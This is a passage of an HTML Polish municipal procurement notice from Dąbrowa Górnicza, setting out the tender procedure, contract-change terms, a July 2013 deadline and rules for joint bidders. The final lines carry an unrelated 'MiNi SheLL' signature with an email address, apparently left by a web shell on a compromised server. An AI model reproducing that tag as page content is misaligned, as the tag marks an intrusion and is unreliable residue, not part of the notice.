11. Dokumenty wchodzące w skład oferty, w tym również te przedstawione w formie oryginałów, nie podlegają zwrotowi przez Zamawiającego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy:
1.w zakresie zmiany terminów realizacji zamówienia na skutek wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, 
a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu.
2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1 Zmian przepisów prawa istotnych dla zawartej umowy.
2.2 Zmiany stawki podatku VAT:
2.2.1. W przypadku zwiększenia stawki podatku VAT -  ceny jednostkowe brutto Formularza cenowego nie mogą być wyższe niż zadeklarowane w ofercie przez cały okres obowiązywania umowy. 
2.2.2. W przypadku zmniejszenia stawki podatku VAT - ceny jednostkowe brutto Formularza cenowego zostaną odpowiednio pomniejszone w odniesieniu do cen brutto zadeklarowanych w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.
2.3. Obniżenie ceny abonamentu oraz cen usług, gdy abonament lub opłaty za świadczone usługi telefoniczne będą niższe w aktualnie obowiązującym cenniku operatorskim Wykonawcy.
2.4. Przeniesienia numeru, gdy ulegnie zmianie adres siedziby Zamawiającego lub zostanie utworzona dodatkowa siedziba Zamawiającego lub jednostek mu podległych.
3. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
4. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Administracyjny, IV piętro, pok. 403.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2013 godzina 09:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, 
ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej.
2. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
3.1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w pkt 8 SIWZ oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SIWZ.
3.2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wykaz i dokumenty wymienione w  pkt. 9.1.2. SIWZ Wykonawcy składają wspólnie, dokumenty i oświadczenia wymienione w pkt 9.2. i 9.3. SIWZ podpisane przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Oświadczenie wymienione w pkt 9.1.1. SIWZ składają wszyscy Wykonawcy wspólnie na jednym druku lub pełnomocnik w imieniu wszystkich Wykonawców, Formularz  ofertowy wymieniony w pkt 9.4.1. SIWZ oraz Formularz cenowy wymieniony w pkt 9.4.2. SIWZ - winny być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
3.3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
3.4. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
4. Uszczegółowienie sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:
Termin rozpoczęcia:1 września 2013r. lub od dnia zawarcia umowy, w przypadku zawarcia umowy w późniejszym terminie.
Termin zakończenia: 24 miesięcy od dnia podpisania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com